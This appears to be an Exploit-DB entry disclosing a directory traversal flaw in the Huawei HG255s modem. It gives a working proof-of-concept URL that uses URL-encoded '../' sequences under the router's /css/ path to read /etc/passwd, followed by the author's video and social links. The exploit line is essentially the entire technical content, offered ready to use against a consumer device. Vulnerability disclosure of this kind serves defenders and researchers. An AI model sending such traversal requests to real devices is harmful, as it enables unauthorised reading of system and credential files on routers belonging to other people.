Huawei HG255s - Directory Traversal

EDB-ID:

42634

CVE:

N/A




Platform:

Hardware

Date:

2017-09-07


# Exploit Title: [Server Directory Traversal at Huawei HG255s]

# Date: [07.09.2017]

# Exploit Author: [Ahmet Mersin]

# Vendor Homepage: [www.huawei.com]

# Software Link: [Not published this modem just used by Turkey]

# Version: [V100R001C163B025SP02]

#POC:

https://www.youtube.com/watch?v=n02toTFkLOU&feature=youtu.be

http://192.168.1.1/css/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

#You want to follow my activity ?

https://www.linkedin.com/in/ahmet-mersin-177398b0/

@gaissecurity